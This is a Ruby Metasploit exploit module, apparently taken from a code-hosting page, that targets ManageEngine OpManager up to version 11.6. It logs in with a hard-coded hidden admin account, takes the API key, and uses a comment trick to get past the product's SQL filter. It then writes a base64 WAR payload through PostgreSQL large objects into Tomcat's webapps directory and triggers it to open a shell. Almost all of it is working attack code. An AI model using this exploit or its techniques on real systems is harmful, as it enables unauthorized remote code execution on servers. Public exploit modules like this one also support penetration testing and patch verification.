185 lines
6.0 KiB
Ruby
185 lines
6.0 KiB
Ruby
##
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# This module requires Metasploit: http://metasploit.com/download
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# Current source: https://github.com/rapid7/metasploit-framework
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##
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require 'msf/core'
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class Metasploit3 < Msf::Exploit::Remote
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# It removes large object in database, shoudn't be a problem, but just in case....
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Rank = ManualRanking
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include Msf::Exploit::Remote::HttpClient
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include Msf::Exploit::FileDropper
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def initialize(info={})
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super(update_info(info,
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'Name' => 'ManageEngine OpManager Remote Code Execution',
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'Description' => %q{
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This module exploits a default credential vulnerability in ManageEngine OpManager, where a
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default hidden account "IntegrationUser" with administrator privileges exists. The account
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has a default password of "plugin" which can not be reset through the user interface. By
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log-in and abusing the default administrator's SQL query functionality, it's possible to
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write a WAR payload to disk and trigger an automatic deployment of this payload. This
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module has been tested successfully on OpManager v11.5 and v11.6 for Windows.
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},
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'License' => MSF_LICENSE,
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'Author' =>
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[
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'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
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],
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'References' =>
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[
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[ 'EDB', '38174' ],
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[ 'CVE', '2015-7765' ], # Hardcoded password
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[ 'CVE', '2015-7766' ], # SQL query bypass
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[ 'URL', 'http://seclists.org/fulldisclosure/2015/Sep/66' ],
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[ 'URL', 'https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability' ]
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],
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'Platform' => ['java'],
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'Arch' => ARCH_JAVA,
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'Targets' =>
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[
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['ManageEngine OpManager v11.6', {}]
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],
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'Privileged' => false,
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'DisclosureDate' => 'Sep 14 2015',
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'DefaultTarget' => 0))
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end
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def uri
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target_uri.path
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end
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def check
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# Check version
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vprint_status("#{peer} - Trying to detect ManageEngine OpManager")
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res = send_request_cgi({
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'method' => 'GET',
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'uri' => normalize_uri(uri, 'LoginPage.do')
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})
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unless res && res.code == 200
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return Exploit::CheckCode::Safe
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end
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if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/
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version = $1
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if Gem::Version.new(version) <= Gem::Version.new('11.6')
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return Exploit::CheckCode::Appears
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else
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# Patch unknown
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return Exploit::CheckCode::Detected
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end
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elsif res.body =~ /OpManager/
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return Exploit::CheckCode::Detected
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else
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return Exploit::CheckCode::Safe
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end
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end
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def sql_query( key, query )
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res = send_request_cgi({
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'method' => 'POST',
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'uri' => normalize_uri(uri, 'api', 'json', 'admin', 'SubmitQuery'),
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'vars_get' => { 'apiKey' => key },
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'vars_post' => { 'query' => query }
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})
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unless res && res.code == 200
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fail_with(Failure::Unknown, "#{peer} - Query was not succesful!")
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end
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res
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end
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def exploit
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print_status("#{peer} - Access login page")
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res = send_request_cgi({
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'method' => 'POST',
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'uri' => normalize_uri(uri, 'jsp', 'Login.do'),
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'vars_post' => {
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'domainName' => 'NULL',
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'authType' => 'localUserLogin',
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'userName' => 'IntegrationUser', # Hidden user
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'password' => 'plugin' # Password of hidden user
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}
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})
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if res && res.code == 302
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redirect = URI(res.headers['Location']).to_s.gsub(/#\//, "")
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print_status("#{peer} - Location is [ #{redirect} ]")
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else
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fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
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end
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# Follow redirection process
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print_status("#{peer} - Following redirection")
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res = send_request_cgi({
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'uri' => redirect,
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'method' => 'GET'
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})
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if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/
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api_key = $1
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print_status("#{peer} - Retrieved API key [ #{api_key} ]")
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else
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fail_with(Failure::Unknown, "#{peer} - Redirect failed!")
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end
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app_base = rand_text_alphanumeric(4 + rand(32 - 4))
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war_payload = payload.encoded_war({ :app_name => app_base }).to_s
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war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '')
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print_status("#{peer} - Executing SQL queries")
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# Remove large object in database, just in case it exists from previous exploit attempts
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sql = 'SELECT lo_unlink(-1)'
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sql_query(api_key, sql)
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# Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks.
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sql = 'SELECT lo_create(-1)'
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result = sql_query(api_key, sql)
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if result.body =~ /lo_create":([0-9]+)}/
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lo_id = $1
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else
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fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!")
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end
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# Insert WAR payload into the pg_largeobject table. We have to use /**/ to bypass OpManager'sa checks for INSERT/UPDATE/DELETE, etc.
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sql = "INSERT/**/INTO pg_largeobject (loid,pageno,data) VALUES(#{lo_id}, 0, DECODE('#{war_payload_base64}', 'base64'))"
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sql_query(api_key, sql)
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# Export our large object id data into a WAR file
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sql = "SELECT lo_export(#{lo_id}, '..//..//tomcat//webapps//#{app_base}.war');"
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sql_query(api_key, sql)
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# Remove our large object in the database
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sql = 'SELECT lo_unlink(-1)'
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sql_query(api_key, sql)
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register_file_for_cleanup("tomcat//webapps//#{app_base}.war")
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register_file_for_cleanup("tomcat//webapps//#{app_base}")
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10.times do
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select(nil, nil, nil, 2)
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# Now make a request to trigger the newly deployed war
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print_status("#{peer} - Attempting to launch payload in deployed WAR...")
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res = send_request_cgi(
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{
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'uri' => normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"),
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'method' => 'GET'
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})
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# Failure. The request timed out or the server went away.
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break if res.nil?
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# Success! Triggered the payload, should have a shell incoming
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break if res.code == 200
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end
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end
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end
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